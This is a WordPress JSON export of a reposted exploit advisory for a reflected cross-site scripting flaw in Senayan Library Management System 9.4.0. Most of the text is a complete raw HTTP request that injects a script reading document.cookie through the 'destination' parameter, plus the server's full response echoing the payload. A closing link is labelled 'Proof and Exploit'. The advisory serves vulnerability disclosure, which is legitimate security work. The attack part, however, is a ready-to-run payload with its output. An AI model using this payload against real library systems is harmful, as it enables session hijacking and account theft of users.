{"id":34594,"date":"2022-12-10T05:58:09","date_gmt":"2022-12-10T02:58:09","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170182\/slms940-xss.txt"},"modified":"2022-12-10T13:23:37","modified_gmt":"2022-12-10T09:53:37","slug":"senayan-library-management-system-9-4-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/senayan-library-management-system-9-4-0-cross-site-scripting\/","title":{"rendered":"Senayan Library Management System 9.4.0 Cross Site Scripting"},"content":{"rendered":"<p dir=\"ltr\">## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9<br \/>\nXSS-Reflected- PHPSESSID Hijacking<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 12.08.2022<br \/>\n## Vendor: https:\/\/slims.web.id\/web\/<br \/>\n## Software: https:\/\/slims.web.id\/web\/news\/rilis-9.4.0\/<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.4.0<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe value of the `destination` request parameter is copied into the<br \/>\nvalue of an HTML tag attribute which is encapsulated in double<br \/>\nquotation marks.<br \/>\nThe payload zbuip&#8221;&gt;&lt;script&gt;alert(hello_vulnerability)&lt;\/script&gt;jgoihbmmygl<br \/>\nwas submitted in the destination parameter.<br \/>\nThis input was echoed unmodified in the application&#8217;s response. The<br \/>\nattacker can hijack the session of some users of the system.<\/p>\n<p dir=\"ltr\">## STATUS: HIGH Vulnerability<\/p>\n<p dir=\"ltr\">[+] Payload:<\/p>\n<p dir=\"ltr\">&#8220;`GET<br \/>\nGET \/slims9_bulian-9.4.0\/index.php?p=member&amp;destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&amp;memberID=admin&amp;memberPassWord=password&amp;_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&amp;logMeIn=Login<br \/>\nHTTP\/1.1<br \/>\nHost: pwnedhost.com<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9<br \/>\nAccept-Language: en-US;q=0.9,en;q=0.8<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.5304.107<br \/>\nSafari\/537.36<br \/>\nConnection: close<br \/>\nCache-Control: max-age=0<br \/>\nCookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m<br \/>\nOrigin: http:\/\/pwnedhost.com<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nReferer: http:\/\/pwnedhost.com\/slims9_bulian-9.4.0\/index.php?p=member<br \/>\nSec-CH-UA: &#8220;.Not\/A)Brand&#8221;;v=&#8221;99&#8243;, &#8220;Google Chrome&#8221;;v=&#8221;107&#8243;, &#8220;Chromium&#8221;;v=&#8221;107&#8243;<br \/>\nSec-CH-UA-Platform: Windows<br \/>\nSec-CH-UA-Mobile: ?0<br \/>\n&#8220;`<br \/>\n[+] Response:<\/p>\n<p dir=\"ltr\">&#8220;`HTTP\/1<br \/>\nHTTP\/1.1 200 OK<br \/>\nDate: Thu, 08 Dec 2022 18:43:20 GMT<br \/>\nServer: Apache\/2.4.54 (Win64) OpenSSL\/1.1.1p PHP\/7.4.30<br \/>\nX-Frame-Options: SAMEORIGIN<br \/>\nX-Powered-By: PHP\/7.4.30<br \/>\nExpires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>\nCache-Control: no-store, no-cache, must-revalidate<br \/>\nPragma: no-cache<br \/>\nX-XSS-Protection: 1; mode=block<br \/>\nConnection: close<br \/>\nContent-Type: text\/html; charset=UTF-8<br \/>\nContent-Length: 30590<\/p>\n<p dir=\"ltr\">&lt;!&#8211;<br \/>\n# ===============================<br \/>\n# Classic SLiMS Template<br \/>\n# ===============================<br \/>\n# @Author: Waris Agung Widodo<br \/>\n# @Email: ido.alit@gmail.com<br \/>\n# @Date: 2018-01-23T11:25:57+07:00<br \/>\n# @Last modified by: Waris Agung Widodo<br \/>\n# @Last modified time: 2019-01-03T11:25:57+07:00<br \/>\n&#8211;&gt;<br \/>\n&lt;!DOCTYPE html&gt;<br \/>\n&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;meta charset=&#8221;utf-8&#8243;&gt;<br \/>\n&lt;title&gt;Open Source Library Management System | Senayan&lt;\/title&gt;<br \/>\n&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width,<br \/>\ninitial-scale=1, shrink-to-fit=no&#8221;&gt;<\/p>\n<p dir=\"ltr\">&lt;meta http-equiv=&#8221;X-UA-Compatible&#8221; content=&#8221;IE=edge&#8221;&gt;<br \/>\n&lt;meta http-equiv=&#8221;Content-Type&#8221; content=&#8221;text\/html; charset=utf-8&#8243;\/&gt;<br \/>\n&lt;meta http-equiv=&#8221;Pragma&#8221; content=&#8221;no-cache&#8221;\/&gt;<br \/>\n&lt;meta http-equiv=&#8221;Cache-Control&#8221; content=&#8221;no-store, no-cache,<br \/>\nmust-revalidate, post-check=0, pre-check=0&#8243;\/&gt;<br \/>\n&lt;meta http-equiv=&#8221;Expires&#8221; content=&#8221;Sat, 26 Jul 1997 05:00:00 GMT&#8221;\/&gt;<br \/>\n&lt;meta name=&#8221;robots&#8221; content=&#8221;noindex, follow&#8221;&gt; &lt;meta<br \/>\nname=&#8221;description&#8221; content=&#8221;Open Source Library Management System |<br \/>\nSenayan&#8221;&gt;<br \/>\n&lt;meta name=&#8221;keywords&#8221; content=&#8221;Open Source Library Management System&#8221;&gt;<br \/>\n&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width,<br \/>\nheight=device-height, initial-scale=1&#8243;&gt;<br \/>\n&lt;meta name=&#8221;generator&#8221; content=&#8221;SLiMS 9 (Bulian)&#8221;&gt;<br \/>\n&lt;meta name=&#8221;theme-color&#8221; content=&#8221;#000&#8243;&gt;<\/p>\n<p dir=\"ltr\">&lt;meta property=&#8221;og:locale&#8221; content=&#8221;en_US&#8221;\/&gt;<br \/>\n&lt;meta property=&#8221;og:type&#8221; content=&#8221;book&#8221;\/&gt;<br \/>\n&lt;meta property=&#8221;og:title&#8221; content=&#8221;Open Source Library Management<br \/>\nSystem | Senayan&#8221;\/&gt;<br \/>\n&lt;meta property=&#8221;og:description&#8221; content=&#8221;Open Source Library<br \/>\nManagement System&#8221;\/&gt;<br \/>\n&lt;meta property=&#8221;og:url&#8221;<br \/>\ncontent=&#8221;\/\/pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin&#8221;\/&gt;<br \/>\n&lt;meta property=&#8221;og:site_name&#8221; content=&#8221;Senayan&#8221;\/&gt;<br \/>\n&lt;meta property=&#8221;og:image&#8221;<br \/>\ncontent=&#8221;\/\/pwnedhost.com\/slims9_bulian-9.4.0\/template\/default\/img\/logo.png&#8221;\/&gt;<\/p>\n<p dir=\"ltr\">&lt;meta name=&#8221;twitter:card&#8221; content=&#8221;summary&#8221;&gt;<br \/>\n&lt;meta name=&#8221;twitter:url&#8221;<br \/>\ncontent=&#8221;\/\/pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin&#8221;\/&gt;<br \/>\n&lt;meta name=&#8221;twitter:title&#8221; content=&#8221;Open Source Library Management<br \/>\nSystem | Senayan&#8221;\/&gt;<br \/>\n&lt;meta property=&#8221;twitter:image&#8221;<br \/>\ncontent=&#8221;\/\/pwnedhost.com\/slims9_bulian-9.4.0\/template\/default\/img\/logo.png&#8221;\/&gt;<br \/>\n&lt;!&#8211; \/\/ load bootstrap style &#8211;&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221; href=&#8221;template\/default\/assets\/css\/bootstrap.min.css&#8221;&gt;<br \/>\n&lt;!&#8211; \/\/ font awesome &#8211;&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221;<br \/>\nhref=&#8221;template\/default\/assets\/plugin\/font-awesome\/css\/fontawesome-all.min.css&#8221;&gt;<br \/>\n&lt;!&#8211; Tailwind CSS &#8211;&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221; href=&#8221;template\/default\/assets\/css\/tailwind.min.css&#8221;&gt;<br \/>\n&lt;!&#8211; Vegas CSS &#8211;&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221;<br \/>\nhref=&#8221;template\/default\/assets\/plugin\/vegas\/vegas.min.css&#8221;&gt;<br \/>\n&lt;link href=&#8221;\/slims9_bulian-9.4.0\/js\/toastr\/toastr.min.css?31014320&#8243;<br \/>\nrel=&#8221;stylesheet&#8221; type=&#8221;text\/css&#8221;\/&gt;<br \/>\n&lt;!&#8211; SLiMS CSS &#8211;&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221; href=&#8221;\/slims9_bulian-9.4.0\/js\/colorbox\/colorbox.css&#8221;&gt;<br \/>\n&lt;!&#8211; \/\/ Flag css &#8211;&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221; href=&#8221;template\/default\/assets\/css\/flag-icon.min.css&#8221;&gt;<br \/>\n&lt;!&#8211; \/\/ my custom style &#8211;&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221;<br \/>\nhref=&#8221;template\/default\/assets\/css\/style.css?v=20221209-014320&#8243;&gt;<\/p>\n<p dir=\"ltr\">&lt;link rel=&#8221;shortcut icon&#8221; href=&#8221;webicon.ico&#8221; type=&#8221;image\/x-icon&#8221;\/&gt;<\/p>\n<p dir=\"ltr\">&lt;!&#8211; \/\/ load vue js &#8211;&gt;<br \/>\n&lt;script src=&#8221;template\/default\/assets\/js\/vue.min.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;!&#8211; \/\/ load jquery library &#8211;&gt;<br \/>\n&lt;script src=&#8221;template\/default\/assets\/js\/jquery.min.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;!&#8211; \/\/ load popper javascript &#8211;&gt;<br \/>\n&lt;script src=&#8221;template\/default\/assets\/js\/popper.min.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;!&#8211; \/\/ load bootstrap javascript &#8211;&gt;<br \/>\n&lt;script src=&#8221;template\/default\/assets\/js\/bootstrap.min.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;!&#8211; \/\/ load vegas javascript &#8211;&gt;<br \/>\n&lt;script src=&#8221;template\/default\/assets\/plugin\/vegas\/vegas.min.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;script src=&#8221;\/slims9_bulian-9.4.0\/js\/toastr\/toastr.min.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;!&#8211; \/\/ load SLiMS javascript &#8211;&gt;<br \/>\n&lt;script src=&#8221;\/slims9_bulian-9.4.0\/js\/colorbox\/jquery.colorbox-min.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;script src=&#8221;\/slims9_bulian-9.4.0\/js\/gui.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;script src=&#8221;\/slims9_bulian-9.4.0\/js\/fancywebsocket.js&#8221;&gt;&lt;\/script&gt;<\/p>\n<p dir=\"ltr\">&lt;\/head&gt;<br \/>\n&lt;body class=&#8221;bg-grey-lightest&#8221;&gt;<\/p>\n<p dir=\"ltr\">&lt;div class=&#8221;result-search page-member-area&#8221;&gt;<br \/>\n&lt;section id=&#8221;section1 container-fluid&#8221;&gt;<br \/>\n&lt;header class=&#8221;c-header&#8221;&gt;<br \/>\n&lt;div class=&#8221;mask&#8221;&gt;&lt;\/div&gt;<\/p>\n<p dir=\"ltr\">&lt;nav class=&#8221;navbar navbar-expand-lg navbar-dark bg-transparent&#8221;&gt;<br \/>\n&lt;a class=&#8221;navbar-brand inline-flex items-center&#8221; href=&#8221;index.php&#8221;&gt;<br \/>\n&lt;svg<br \/>\nclass=&#8221;fill-current text-white inline-block h-8 w-8&#8243;<br \/>\nversion=&#8221;1.1&#8243;<br \/>\nxmlns=&#8221;http:\/\/www.w3.org\/2000\/svg&#8221;<br \/>\nxmlns:xlink=&#8221;http:\/\/www.w3.org\/1999\/xlink&#8221;<br \/>\nviewBox=&#8221;0 0 118.4 135&#8243; style=&#8221;enable-background:new 0 0 118.4 135;&#8221;<br \/>\nxml:space=&#8221;preserve&#8221;&gt;<br \/>\n&lt;path<br \/>\nd=&#8221;M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1<\/p>\n<p dir=\"ltr\">l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2<\/p>\n<p dir=\"ltr\">c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4<br \/>\nC118.4,98.6,118.3,98.5,118.3,98.3z<br \/>\nM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6<\/p>\n<p dir=\"ltr\">L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0<br \/>\nc0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z<br \/>\nM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z&#8221;\/&gt;<br \/>\n&lt;\/svg&gt;<br \/>\n&lt;div class=&#8221;inline-flex flex-col leading-tight ml-2&#8243;&gt;<br \/>\n&lt;h1 class=&#8221;text-lg m-0 p-0&#8243;&gt;Senayan&lt;\/h1&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/a&gt;<br \/>\n&lt;button class=&#8221;navbar-toggler&#8221; type=&#8221;button&#8221;<br \/>\ndata-toggle=&#8221;collapse&#8221; data-target=&#8221;#navbarSupportedContent&#8221;<br \/>\naria-controls=&#8221;navbarSupportedContent&#8221;<br \/>\naria-expanded=&#8221;false&#8221; aria-label=&#8221;Toggle navigation&#8221;&gt;<br \/>\n&lt;span class=&#8221;navbar-toggler-icon&#8221;&gt;&lt;\/span&gt;<br \/>\n&lt;\/button&gt;<\/p>\n<p dir=\"ltr\">&lt;div class=&#8221;collapse navbar-collapse&#8221; id=&#8221;navbarSupportedContent&#8221;&gt;<br \/>\n&lt;ul class=&#8221;navbar-nav ml-auto&#8221;&gt;<br \/>\n&lt;li class=&#8221;nav-item &#8220;&gt;<br \/>\n&lt;a class=&#8221;nav-link&#8221; href=&#8221;index.php&#8221;&gt;Home&lt;\/a&gt;<br \/>\n&lt;\/li&gt;&lt;li class=&#8221;nav-item &#8220;&gt;<br \/>\n&lt;a class=&#8221;nav-link&#8221; href=&#8221;index.php?p=libinfo&#8221;&gt;Information&lt;\/a&gt;<br \/>\n&lt;\/li&gt;&lt;li class=&#8221;nav-item &#8220;&gt;<br \/>\n&lt;a class=&#8221;nav-link&#8221; href=&#8221;index.php?p=news&#8221;&gt;News&lt;\/a&gt;<br \/>\n&lt;\/li&gt;&lt;li class=&#8221;nav-item &#8220;&gt;<br \/>\n&lt;a class=&#8221;nav-link&#8221; href=&#8221;index.php?p=help&#8221;&gt;Help&lt;\/a&gt;<br \/>\n&lt;\/li&gt;&lt;li class=&#8221;nav-item &#8220;&gt;<br \/>\n&lt;a class=&#8221;nav-link&#8221; href=&#8221;index.php?p=librarian&#8221;&gt;Librarian&lt;\/a&gt;<br \/>\n&lt;\/li&gt; &lt;li class=&#8221;nav-item active&#8221;&gt;<br \/>\n&lt;a class=&#8221;nav-link&#8221; href=&#8221;index.php?p=member&#8221;&gt;Member Area&lt;\/a&gt;<br \/>\n&lt;\/li&gt;<br \/>\n&lt;li class=&#8221;nav-item dropdown&#8221;&gt;<br \/>\n&lt;a class=&#8221;nav-link dropdown-toggle<br \/>\ncursor-pointer&#8221; type=&#8221;button&#8221; id=&#8221;languageMenuButton&#8221;<br \/>\ndata-toggle=&#8221;dropdown&#8221; aria-haspopup=&#8221;true&#8221;<br \/>\naria-expanded=&#8221;false&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-us&#8221;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt;<br \/>\n&lt;\/a&gt;<br \/>\n&lt;div class=&#8221;dropdown-menu bg-grey-lighter<br \/>\ndropdown-menu-lg-right&#8221; aria-labelledby=&#8221;dropdownMenuButton&#8221;&gt;<br \/>\n&lt;h6 class=&#8221;dropdown-header&#8221;&gt;Select Language : &lt;\/h6&gt;<br \/>\n&lt;a class=&#8221;dropdown-item&#8221;<br \/>\nhref=&#8221;index.php?select_lang=ar_SA&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-sa mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Arabic<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=bn_BD&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-bd mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Bengali<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=pt_BR&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-br mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Brazilian Portuguese<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=en_US&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-us mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; English<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=es_ES&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-es mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Espanol<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=de_DE&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-de mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; German<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=id_ID&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-id mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Indonesian<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=ja_JP&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-jp mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Japanese<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=my_MY&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-my mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Malay<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=fa_IR&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-ir mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Persian<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=ru_RU&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-ru mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Russian<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=th_TH&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-th mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Thai<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=tr_TR&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-tr mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Turkish<br \/>\n&lt;\/a&gt; &lt;a class=&#8221;dropdown-item&#8221; href=&#8221;index.php?select_lang=ur_PK&#8221;&gt;<br \/>\n&lt;span class=&#8221;flag-icon flag-icon-pk mr-2&#8243;<br \/>\nstyle=&#8221;border-radius: 2px;&#8221;&gt;&lt;\/span&gt; Urdu<br \/>\n&lt;\/a&gt; &lt;\/div&gt;<br \/>\n&lt;\/li&gt;<br \/>\n&lt;\/ul&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/nav&gt;<br \/>\n&lt;\/header&gt;<br \/>\n&lt;div class=&#8221;search&#8221; id=&#8221;search-wraper&#8221;<br \/>\nxmlns:v-bind=&#8221;http:\/\/www.w3.org\/1999\/xhtml&#8221;&gt;<br \/>\n&lt;div class=&#8221;container&#8221;&gt;<br \/>\n&lt;div class=&#8221;row&#8221;&gt;<br \/>\n&lt;div class=&#8221;col-lg-8 mx-auto&#8221;&gt;<br \/>\n&lt;div class=&#8221;card border-0 shadow&#8221;&gt;<br \/>\n&lt;div class=&#8221;card-body&#8221;&gt;<br \/>\n&lt;form class=&#8221;&#8221; action=&#8221;index.php&#8221; method=&#8221;get&#8221;<br \/>\n@submit.prevent=&#8221;searchSubmit&#8221;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;search&#8221; value=&#8221;search&#8221;&gt;<br \/>\n&lt;input ref=&#8221;keywords&#8221; value=&#8221;&#8221;<br \/>\nv-model.trim=&#8221;keywords&#8221;<br \/>\n@focus=&#8221;searchOnFocus&#8221;<br \/>\n@blur=&#8221;searchOnBlur&#8221; type=&#8221;text&#8221; id=&#8221;search-input&#8221;<br \/>\nname=&#8221;keywords&#8221;<br \/>\nclass=&#8221;input-transparent w-100&#8243; autocomplete=&#8221;off&#8221;<br \/>\nplaceholder=&#8221;Enter keyword to<br \/>\nsearch collection&#8230;&#8221;\/&gt;<br \/>\n&lt;\/form&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;transition name=&#8221;slide-fade&#8221;&gt;<br \/>\n&lt;div v-if=&#8221;show&#8221; class=&#8221;advanced-wraper shadow<br \/>\nmt-4&#8243; id=&#8221;advanced-wraper&#8221;<br \/>\nv-click-outside=&#8221;hideSearch&#8221;&gt;<br \/>\n&lt;p class=&#8221;label mb-2&#8243;&gt;<br \/>\nSearch by : &lt;i<br \/>\n@click=&#8221;hideSearch&#8221;<br \/>\nclass=&#8221;far fa-times-circle float-right<br \/>\ntext-danger cursor-pointer&#8221;&gt;&lt;\/i&gt;<br \/>\n&lt;\/p&gt;<br \/>\n&lt;div class=&#8221;d-flex flex-wrap&#8221;&gt;<br \/>\n&lt;a v-bind:class=&#8221;{&#8216;btn-primary<br \/>\ntext-white&#8217;: searchBy === &#8216;keywords&#8217;, &#8216;btn-outline-secondary&#8217;:<br \/>\nsearchBy !== &#8216;keywords&#8217; }&#8221;<br \/>\n@click=&#8221;searchOnClick(&#8216;keywords&#8217;)&#8221;<br \/>\nclass=&#8221;btn mr-2 mb-2&#8243;&gt;ALL&lt;\/a&gt;<br \/>\n&lt;a v-bind:class=&#8221;{&#8216;btn-primary<br \/>\ntext-white&#8217;: searchBy === &#8216;author&#8217;, &#8216;btn-outline-secondary&#8217;: searchBy<br \/>\n!== &#8216;author&#8217; }&#8221;<br \/>\n@click=&#8221;searchOnClick(&#8216;author&#8217;)&#8221;<br \/>\nclass=&#8221;btn mr-2 mb-2&#8243;&gt;Author&lt;\/a&gt;<br \/>\n&lt;a v-bind:class=&#8221;{&#8216;btn-primary<br \/>\ntext-white&#8217;: searchBy === &#8216;subject&#8217;, &#8216;btn-outline-secondary&#8217;: searchBy<br \/>\n!== &#8216;subject&#8217; }&#8221;<br \/>\n@click=&#8221;searchOnClick(&#8216;subject&#8217;)&#8221;<br \/>\nclass=&#8221;btn mr-2 mb-2&#8243;&gt;Subject&lt;\/a&gt;<br \/>\n&lt;a v-bind:class=&#8221;{&#8216;btn-primary<br \/>\ntext-white&#8217;: searchBy === &#8216;isbn&#8217;, &#8216;btn-outline-secondary&#8217;: searchBy<br \/>\n!== &#8216;isbn&#8217; }&#8221;<br \/>\n@click=&#8221;searchOnClick(&#8216;isbn&#8217;)&#8221;<br \/>\nclass=&#8221;btn mr-2 mb-2&#8243;&gt;ISBN\/ISSN&lt;\/a&gt;<br \/>\n&lt;button class=&#8221;btn btn-light mr-2 mb-2&#8243;<br \/>\ndisabled&gt;OR TRY&lt;\/button&gt;<br \/>\n&lt;a class=&#8221;btn btn-outline-primary mr-2<br \/>\nmb-2&#8243; data-toggle=&#8221;modal&#8221; data-target=&#8221;#adv-modal&#8221;&gt;Advanced Search&lt;\/a&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;p v-if=&#8221;lastKeywords.length &gt; 0&#8243; class=&#8221;label<br \/>\nmt-4&#8243;&gt;Last search:&lt;\/p&gt;<br \/>\n&lt;a<br \/>\n:href=&#8221;`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&amp;search=search`&#8221;<br \/>\nclass=&#8221;flex items-center justify-between<br \/>\npy-1 text-decoration-none text-grey-darkest hover:text-blue&#8221;<br \/>\nv-for=&#8221;k in lastKeywords&#8221; :key=&#8221;k&#8221;&gt;&lt;span&gt;&lt;i<br \/>\nclass=&#8221;far fa-clock<br \/>\ntext-grey-dark mr-2&#8243;&gt;&lt;\/i&gt;&lt;span class=&#8221;italic<br \/>\ntext-sm&#8221;&gt;{{tmpObj[k].text}}&lt;\/span&gt;&lt;\/span&gt;&lt;i<br \/>\nclass=&#8221;fas fa-angle-right<br \/>\ntext-grey-dark&#8221;&gt;&lt;\/i&gt;&lt;\/a&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/transition&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/section&gt;<\/p>\n<p dir=\"ltr\">&lt;div class=&#8221;container py-4&#8243;&gt;<br \/>\n&lt;div class=&#8221;row&#8221;&gt;<br \/>\n&lt;div class=&#8221;col-md-8&#8243;&gt;<br \/>\n&lt;div&gt;<br \/>\n&lt;div class=&#8221;tagline&#8221;&gt;Library Member Login&lt;\/div&gt;<br \/>\n&lt;div class=&#8221;loginInfo&#8221;&gt;Please insert your member ID<br \/>\nand password given by library system administrator. If you are<br \/>\nlibrary&#8217;s member and don&#8217;t have a password yet, please contact library<br \/>\nstaff.&lt;\/div&gt;<br \/>\n&lt;div class=&#8221;loginInfo&#8221;&gt;<br \/>\n&lt;form<br \/>\naction=&#8221;index.php?p=member&amp;destination=zbuip&#8221;&gt;&lt;script&gt;alert(document.cookie)&lt;\/script&gt;jgoihbmmygl&#8221;<br \/>\nmethod=&#8221;post&#8221;&gt;<br \/>\n&lt;div class=&#8221;fieldLabel&#8221;&gt;Member ID&lt;\/div&gt;<\/p>\n<p dir=\"ltr\">&#8220;`<br \/>\n## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.4.0)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/dsl863)<\/p>\n<p dir=\"ltr\">## Time spent<br \/>\n`01:30:00`<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9 XSS-Reflected- PHPSESSID Hijacking ## Author: nu11secur1ty ## Date: 12.08.2022 ## Vendor: https:\/\/slims.web.id\/web\/ ## Software: https:\/\/slims.web.id\/web\/news\/rilis-9.4.0\/ ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.4.0 ## Description: The value of the `destination` request parameter is copied into the value of 